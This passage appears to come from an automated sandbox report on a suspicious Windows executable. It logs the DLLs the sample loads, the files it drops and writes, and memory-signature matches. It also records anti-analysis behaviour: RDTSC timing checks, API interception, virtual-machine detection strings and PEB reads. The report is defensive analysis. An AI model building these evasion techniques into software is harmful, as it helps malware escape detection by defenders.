      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeFile written: C:\Windows\Resources\primy.iniJump to behavior
      Source: wmKmOQ868z.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: wmKmOQ868z.exe, 00000004.00000001.2652302474.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: wmKmOQ868z.exe, 00000004.00000003.3010655343.00000000326C6000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3008542266.000000003251B000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: wmKmOQ868z.exe, wmKmOQ868z.exe, 00000004.00000003.3010655343.00000000326C6000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3008542266.000000003251B000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: wmKmOQ868z.exe, 00000004.00000001.2652302474.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.2653654327.0000000003020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_6F701BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F701BFF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_6F7030C0 push eax; ret 0_2_6F7030EE
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A09AD push ecx; mov dword ptr [esp], ecx4_2_328A09B6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeFile created: C:\Users\user\AppData\Local\Temp\nsx116.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeFile opened: C:\Program Files (x86)\salinity\hypophyllum.ter count: 40090Jump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeAPI/Special instruction interceptor: Address: 34B1E59
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeAPI/Special instruction interceptor: Address: 1C11E59
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeRDTSC instruction interceptor: First address: 347A901 second address: 347A901 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FC2F8534996h 0x00000006 inc ebp 0x00000007 cmp cl, al 0x00000009 inc ebx 0x0000000a cmp bl, al 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeRDTSC instruction interceptor: First address: 1BDA901 second address: 1BDA901 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FC2F8FB8F76h 0x00000006 inc ebp 0x00000007 cmp cl, al 0x00000009 inc ebx 0x0000000a cmp bl, al 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3291D1C0 rdtsc 4_2_3291D1C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx116.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeAPI coverage: 0.1 %
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C60
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
      Source: wmKmOQ868z.exe, 00000000.00000002.2652875004.0000000000928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:44
      Source: wmKmOQ868z.exe, 00000004.00000002.3341099454.000000000277A000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3008838276.000000000277A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wmKmOQ868z.exe, 00000004.00000002.3341033592.0000000002718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeAPI call chain: ExitProcess graph end nodegraph_0-2648
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeAPI call chain: ExitProcess graph end nodegraph_0-2868
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3291D1C0 rdtsc 4_2_3291D1C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E35C0 NtCreateMutant,LdrInitializeThunk,4_2_328E35C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_6F701BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F701BFF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D329E mov eax, dword ptr fs:[00000030h]4_2_328D329E
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D329E mov eax, dword ptr fs:[00000030h]4_2_328D329E
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32975283 mov eax, dword ptr fs:[00000030h]4_2_32975283
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B52A0 mov eax, dword ptr fs:[00000030h]4_2_328B52A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B52A0 mov eax, dword ptr fs:[00000030h]4_2_328B52A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B52A0 mov eax, dword ptr fs:[00000030h]4_2_328B52A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B52A0 mov eax, dword ptr fs:[00000030h]4_2_328B52A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329292BC mov eax, dword ptr fs:[00000030h]4_2_329292BC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329292BC mov eax, dword ptr fs:[00000030h]4_2_329292BC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329292BC mov ecx, dword ptr fs:[00000030h]4_2_329292BC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329292BC mov ecx, dword ptr fs:[00000030h]4_2_329292BC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329692A6 mov eax, dword ptr fs:[00000030h]4_2_329692A6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329692A6 mov eax, dword ptr fs:[00000030h]4_2_329692A6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329692A6 mov eax, dword ptr fs:[00000030h]4_2_329692A6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329692A6 mov eax, dword ptr fs:[00000030h]4_2_329692A6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329372A0 mov eax, dword ptr fs:[00000030h]4_2_329372A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329372A0 mov eax, dword ptr fs:[00000030h]4_2_329372A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB2C0 mov eax, dword ptr fs:[00000030h]4_2_328CB2C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB2C0 mov eax, dword ptr fs:[00000030h]4_2_328CB2C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB2C0 mov eax, dword ptr fs:[00000030h]4_2_328CB2C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB2C0 mov eax, dword ptr fs:[00000030h]4_2_328CB2C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB2C0 mov eax, dword ptr fs:[00000030h]4_2_328CB2C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB2C0 mov eax, dword ptr fs:[00000030h]4_2_328CB2C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB2C0 mov eax, dword ptr fs:[00000030h]4_2_328CB2C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A92C5 mov eax, dword ptr fs:[00000030h]4_2_328A92C5
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A92C5 mov eax, dword ptr fs:[00000030h]4_2_328A92C5
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B2D3 mov eax, dword ptr fs:[00000030h]4_2_3289B2D3
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B2D3 mov eax, dword ptr fs:[00000030h]4_2_3289B2D3
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B2D3 mov eax, dword ptr fs:[00000030h]4_2_3289B2D3
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF2D0 mov eax, dword ptr fs:[00000030h]4_2_328CF2D0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF2D0 mov eax, dword ptr fs:[00000030h]4_2_328CF2D0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294B2F0 mov eax, dword ptr fs:[00000030h]4_2_3294B2F0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294B2F0 mov eax, dword ptr fs:[00000030h]4_2_3294B2F0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295F2F8 mov eax, dword ptr fs:[00000030h]4_2_3295F2F8
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329752E2 mov eax, dword ptr fs:[00000030h]4_2_329752E2
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328992FF mov eax, dword ptr fs:[00000030h]4_2_328992FF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED mov eax, dword ptr fs:[00000030h]4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D7208 mov eax, dword ptr fs:[00000030h]4_2_328D7208
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D7208 mov eax, dword ptr fs:[00000030h]4_2_328D7208
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32975227 mov eax, dword ptr fs:[00000030h]4_2_32975227
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D724D mov eax, dword ptr fs:[00000030h]4_2_328D724D
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292D250 mov ecx, dword ptr fs:[00000030h]4_2_3292D250
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295B256 mov eax, dword ptr fs:[00000030h]4_2_3295B256
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295B256 mov eax, dword ptr fs:[00000030h]4_2_3295B256
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899240 mov eax, dword ptr fs:[00000030h]4_2_32899240
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899240 mov eax, dword ptr fs:[00000030h]4_2_32899240
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C9274 mov eax, dword ptr fs:[00000030h]4_2_328C9274
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296D26B mov eax, dword ptr fs:[00000030h]4_2_3296D26B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296D26B mov eax, dword ptr fs:[00000030h]4_2_3296D26B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E1270 mov eax, dword ptr fs:[00000030h]4_2_328E1270
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E1270 mov eax, dword ptr fs:[00000030h]4_2_328E1270
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3297539D mov eax, dword ptr fs:[00000030h]4_2_3297539D
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328F739A mov eax, dword ptr fs:[00000030h]4_2_328F739A
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328F739A mov eax, dword ptr fs:[00000030h]4_2_328F739A
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C33A5 mov eax, dword ptr fs:[00000030h]4_2_328C33A5
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D33A0 mov eax, dword ptr fs:[00000030h]4_2_328D33A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D33A0 mov eax, dword ptr fs:[00000030h]4_2_328D33A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329413B9 mov eax, dword ptr fs:[00000030h]4_2_329413B9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329413B9 mov eax, dword ptr fs:[00000030h]4_2_329413B9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329413B9 mov eax, dword ptr fs:[00000030h]4_2_329413B9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295B3D0 mov ecx, dword ptr fs:[00000030h]4_2_3295B3D0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329753FC mov eax, dword ptr fs:[00000030h]4_2_329753FC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295F3E6 mov eax, dword ptr fs:[00000030h]4_2_3295F3E6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292930B mov eax, dword ptr fs:[00000030h]4_2_3292930B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292930B mov eax, dword ptr fs:[00000030h]4_2_3292930B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292930B mov eax, dword ptr fs:[00000030h]4_2_3292930B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF32A mov eax, dword ptr fs:[00000030h]4_2_328CF32A
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32897330 mov eax, dword ptr fs:[00000030h]4_2_32897330
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296132D mov eax, dword ptr fs:[00000030h]4_2_3296132D
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296132D mov eax, dword ptr fs:[00000030h]4_2_3296132D
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289D34C mov eax, dword ptr fs:[00000030h]4_2_3289D34C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289D34C mov eax, dword ptr fs:[00000030h]4_2_3289D34C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32975341 mov eax, dword ptr fs:[00000030h]4_2_32975341
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899353 mov eax, dword ptr fs:[00000030h]4_2_32899353
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899353 mov eax, dword ptr fs:[00000030h]4_2_32899353
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32943370 mov eax, dword ptr fs:[00000030h]4_2_32943370
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295F367 mov eax, dword ptr fs:[00000030h]4_2_3295F367
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A7370 mov eax, dword ptr fs:[00000030h]4_2_328A7370
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A7370 mov eax, dword ptr fs:[00000030h]4_2_328A7370
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A7370 mov eax, dword ptr fs:[00000030h]4_2_328A7370
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289D08D mov eax, dword ptr fs:[00000030h]4_2_3289D08D
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D909C mov eax, dword ptr fs:[00000030h]4_2_328D909C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292D080 mov eax, dword ptr fs:[00000030h]4_2_3292D080
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292D080 mov eax, dword ptr fs:[00000030h]4_2_3292D080
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A5096 mov eax, dword ptr fs:[00000030h]4_2_328A5096
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CD090 mov eax, dword ptr fs:[00000030h]4_2_328CD090
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CD090 mov eax, dword ptr fs:[00000030h]4_2_328CD090
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov ecx, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov ecx, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov ecx, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov ecx, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C0 mov eax, dword ptr fs:[00000030h]4_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329750D9 mov eax, dword ptr fs:[00000030h]4_2_329750D9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3291D0C0 mov eax, dword ptr fs:[00000030h]4_2_3291D0C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3291D0C0 mov eax, dword ptr fs:[00000030h]4_2_3291D0C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C90DB mov eax, dword ptr fs:[00000030h]4_2_328C90DB
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C50E4 mov eax, dword ptr fs:[00000030h]4_2_328C50E4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C50E4 mov ecx, dword ptr fs:[00000030h]4_2_328C50E4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296903E mov eax, dword ptr fs:[00000030h]4_2_3296903E
